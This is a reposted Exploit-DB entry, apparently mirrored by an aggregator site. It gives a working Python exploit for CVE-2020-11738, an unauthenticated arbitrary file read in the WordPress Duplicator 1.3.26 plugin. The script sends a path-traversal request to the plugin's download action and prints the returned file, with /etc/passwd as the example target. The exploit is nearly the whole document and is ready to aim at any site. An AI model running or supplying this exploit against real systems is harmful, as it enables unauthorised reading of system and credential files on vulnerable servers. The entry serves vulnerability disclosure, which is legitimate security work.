[webapps] Wordpress Plugin Duplicator 1.3.26 - Unauthenticated Arbitrary File Read
2021-10-18 16:04:06 Author: www.exploit-db.com(查看原文) 阅读量:54 收藏
2021-10-18 16:04:06 Author: www.exploit-db.com(查看原文) 阅读量:54 收藏
# Exploit Title: Wordpress Plugin Duplicator 1.3.26 - Unauthenticated Arbitrary File Read
# Date: October 16, 2021
# Exploit Author: nam3lum
# Vendor Homepage: https://wordpress.org/plugins/duplicator/
# Software Link: https://downloads.wordpress.org/plugin/duplicator.1.3.26.zip]
# Version: 1.3.26
# Tested on: Ubuntu 16.04
# CVE : CVE-2020-11738
import requests as re
import sys
if len(sys.argv) != 3:
print("Exploit made by nam3lum.")
print("Usage: CVE-2020-11738.py http://192.168.168.167 /etc/passwd")
exit()
arg = sys.argv[1]
file = sys.argv[2]
URL = arg + "/wp-admin/admin-ajax.php?action=duplicator_download&file=../../../../../../../../.." + file
output = re.get(url = URL)
print(output.text)
文章来源: https://www.exploit-db.com/exploits/50420
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh